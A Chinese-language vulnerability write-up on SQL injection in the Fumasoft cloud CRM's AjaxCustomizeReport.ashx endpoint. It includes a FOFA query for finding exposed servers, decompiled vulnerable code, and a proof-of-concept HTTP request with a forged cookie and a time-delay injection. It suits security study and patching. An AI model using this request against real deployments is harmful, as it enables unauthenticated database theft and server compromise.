孚盟云CRM AjaxCustomizeReport.ashx SQL注入漏洞


漏洞简介

上海孚盟软件有限公司是一家专业的外贸SaaS服务和行业解决方案提供商。其旗下产品孚盟云AjaxCustomizeReport.ashx接口存在多个SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

影响版本

fofa语法

app="孚盟软件-孚盟云"

漏洞分析

直接看 AjaxCustomizeReport.ashx 对应的dll文件 FumaCRM_BS.NewWeb.dll 里有关 AjaxCustomizeReport 方法的实现如下

public void ProcessRequest(HttpContext context)
{
  context.Response.ContentType = "text/plain";
  string str1 = context.Request["action"];
  if (!string.IsNullOrEmpty(UserCookie.GetCookieValue("empId")))
  {
    this.userId = UserCookie.GetCookieValue("empId");
    Helper.WriteLog("ShowCustomizeReportData userId:" + this.userId, "ddSaas");
    this.userId = FumaCRM_BS.Utility.Encrypt.Encrypt.DesDecrypt(this.userId);
    Helper.WriteLog("ShowCustomizeReportData DesDecrypt userId:" + this.userId, "ddSaas");
  }
try
{
  string str2 = "";
  string str3 = str1;
  if (!string.op_Equality(str3, "SetQueryConditionAndControlType"))
  {
    if (!string.op_Equality(str3, "GetMouldList"))
    {
      if (!string.op_Equality(str3, "GetCustomizeReportSelectItem"))
      {
        if (string.op_Equality(str3, "GetCustomizeReportDataPage"))
          str2 = this.GetCustomizeReportDataPage(context);
      }
      else
        str2 = this.GetCustomizeReportSelectItem(context);
    }
    else
      str2 = this.GetMouldList(context);
  }
  else
    str2 = this.SetQueryConditionAndControlType(context);
  context.Response.Write(str2);
}

当action=GetMouldList时,看下GetMouldList方法的实现

private string GetMouldList(HttpContext context)
{
  string mouldList = "";
  DataTable table = this.dbHelper.Query($"select * from syMouldFile where BMouldType=4 and MouldName like '%{context.Request["searchTxt"]}%'").Tables[0];
  if (((InternalDataCollectionBase) table.Rows).Count > 0)
  {
    TemplateDocument templateDocument = new TemplateDocument(AppDomain.CurrentDomain.BaseDirectory + "/m/Dingding/CustomizeReport/CustomizeReportSelectMould.html", Encoding.UTF8);
    templateDocument.Variables.SetValue("dt", (object) table);
    mouldList = templateDocument.GetRenderText();
  }
  return mouldList;
}

参数searchTxt未经过任何过滤或校验就被直接拼接进SQL语句中进行执行,从而造成SQL注入漏洞。

当action=GetCustomizeReportSelectItem时,一样的存在SQL注入漏洞

漏洞复现

POST /m/Dingding/Ajax/AjaxCustomizeReport.ashx HTTP/1.1
Host: fumacrm.mrxn.net
Cookie: UserCookie={"empId":"1"}
Content-Type: application/x-www-form-urlencoded

action=GetMouldList&searchTxt='SQLI_POC--

成功延时 4 秒


手机扫码阅读

金和OA GovDel.aspx SQL注入漏洞

金和OA GovAIPDefineFileType.aspx SQL注入漏洞

评 论